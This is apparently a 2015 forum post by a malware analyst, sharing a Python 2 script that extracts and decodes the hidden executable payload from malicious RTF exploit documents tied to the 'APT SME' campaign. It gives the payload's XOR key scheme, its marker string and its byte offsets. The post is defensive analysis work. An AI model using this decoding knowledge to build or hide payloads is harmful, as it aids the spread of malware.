
w@rri0r@bh@y

Apt sme

Greet : "Vinnu", "nightrover","bond"

I have used the name "APT SME" because the payload developer used that name for his project. I have just created an automation to extract the payload file from the exploit used in APT SME.

Sample used for creating Automation:
Md5 - 57A8DB5A5D35464BE16518332A64A992

Shellcode:

Code:
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
Extractor :
Code:
import os, shutil,binascii


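# Working folders, all relative to the directory the script is launched from.
# os.path.join(..., "") keeps the trailing separator that the rest of the
# script relies on when it concatenates folder + filename, and uses the
# platform separator instead of a hard-coded backslash (identical result on
# Windows, and now also usable on POSIX).
_BASE = os.getcwd()
scan = os.path.join(_BASE, "scan", "")              # input samples to process
processed_file = os.path.join(_BASE, "comp", "")    # samples a payload was carved from
nocomp = os.path.join(_BASE, "nocomp", "")          # samples that were not recognised
output = os.path.join(_BASE, "output", "")          # carved payloads (written as .exe_)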

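# Create the three destination folders. Each one is attempted on its own, so
# an already-existing folder (the normal case on a re-run) no longer stops
# the remaining ones from being created; only OSError (exists, permissions)
# is swallowed, any other error still surfaces. The scan folder itself is
# not created here and must already exist.
for _folder in (processed_file, nocomp, output):
    try:
        os.mkdir(_folder)
    except OSError:
        pass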

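# Sorted so that samples are processed in a reproducible order rather than
# whatever order the filesystem happens to return.
samples = sorted(os.listdir(scan))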

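def mov_nocomp(name=None, src=None, dst=None):
    """Park a sample that yielded no payload: move it from scan/ to nocomp/.

    ``name``, ``src`` and ``dst`` default to the module globals ``sample``,
    ``scan`` and ``nocomp`` so the existing zero-argument call sites keep
    working; passing them explicitly makes the helper usable elsewhere.
    A failed move (file already gone, permissions, cross-device error) is
    reported and ignored, keeping the original best-effort behaviour, but
    the bare ``except`` is narrowed so a programming error (or Ctrl-C) is
    no longer swallowed.
    """
    name = sample if name is None else name
    src = scan if src is None else src
    dst = nocomp if dst is None else dst
    try:
        shutil.move(os.path.join(src, name), os.path.join(dst, name))
    except (IOError, OSError, shutil.Error) as exc:
        print("could not move %s to %s: %s" % (name, dst, exc))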

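def mov_processed_file(name=None, src=None, dst=None):
    """Archive a sample a payload was carved from: move it from scan/ to comp/.

    ``name``, ``src`` and ``dst`` default to the module globals ``sample``,
    ``scan`` and ``processed_file`` so the existing zero-argument call sites
    keep working; passing them explicitly makes the helper usable elsewhere.
    A failed move (file already gone, permissions, cross-device error) is
    reported and ignored, keeping the original best-effort behaviour, but
    the bare ``except`` is narrowed so a programming error (or Ctrl-C) is
    no longer swallowed.
    """
    name = sample if name is None else name
    src = scan if src is None else src
    dst = processed_file if dst is None else dst
    try:
        shutil.move(os.path.join(src, name), os.path.join(dst, name))
    except (IOError, OSError, shutil.Error) as exc:
        print("could not move %s to %s: %s" % (name, dst, exc))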


def decoder(rev):
    """Undo the rolling-XOR obfuscation applied to the carved payload.

    ``rev`` is the raw (un-hexed) byte string. A running key starts at 0xD2
    and, for every non-zero input byte, advances by 4 modulo 256. A zero
    byte is copied through without touching the key; a byte equal to the
    current key is also copied through unchanged; any other byte is XORed
    with the key. Returns the decoded string, same length as ``rev``.
    """
    key = 0x0D2
    out = []
    for ch in rev:
        value = ord(ch)
        if value == 0:
            # Null bytes pass through and do not advance the key.
            out.append(ch)
            continue
        key = (key + 0x4) % 0x100
        # A byte equal to the key is kept as-is rather than XORed to zero.
        out.append(ch if value == key else chr(value ^ key))
    return "".join(out)
       
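def mov_hex(data):
    """Convert an ASCII-hex string (two characters per byte) to raw bytes.

    ``data`` must have even length and contain only hex digits; otherwise
    binascii raises (TypeError on Python 2, binascii.Error on Python 3),
    whereas the original pair-by-pair loop failed part-way through with an
    IndexError/TypeError. An empty string yields an empty result.
    """
    # binascii.unhexlify is the C-level equivalent of the old
    # "two chars + str.decode('hex')" loop, without the quadratic
    # string concatenation.
    return binascii.unhexlify(data)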
    

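# Sample-specific carving parameters, derived from the sample whose MD5 is
# quoted above; other variants of the document may need different values.
HEX_START_SKIP = 26        # bytes between the marker hit and the start of the hex blob
HEX_SPAN = 0x58398         # length of the hex blob taken after the marker
PAYLOAD_END = 0x2a268      # number of decoded bytes kept for the PE

# Main driver. The loop variable MUST be called ``sample``: mov_nocomp() and
# mov_processed_file() read it as a module global. The script targets
# Python 2 (str is bytes), which is why "rb" content is compared to plain
# string literals.
for sample in samples:
    with open(os.path.join(scan, sample), "rb") as handle:
        content = handle.read()

    # Only RTF documents are of interest; everything else is parked in nocomp.
    if content[:4] != "{\\rt":
        mov_nocomp()
        continue

    print("Processing_APT_SME" + sample)
    found = content.find("4f4f6262")   # ASCII hex of "OObb": marker preceding the hex blob
    print(found)
    if found > -1:
        data = content[found + HEX_START_SKIP:found + HEX_SPAN]
        data = data.replace("\r\n", "")          # undo RTF line wrapping of the hex text
        comp = decoder(mov_hex(data))
        comp = "MZ" + comp[2:PAYLOAD_END]        # restore the PE magic at offset 0
        # ".exe_" keeps the carved binary from being run by accident.
        with open(os.path.join(output, sample + ".exe_"), "wb") as out:
            out.write(comp)
        mov_processed_file()
    else:
        mov_nocomp()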

Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y
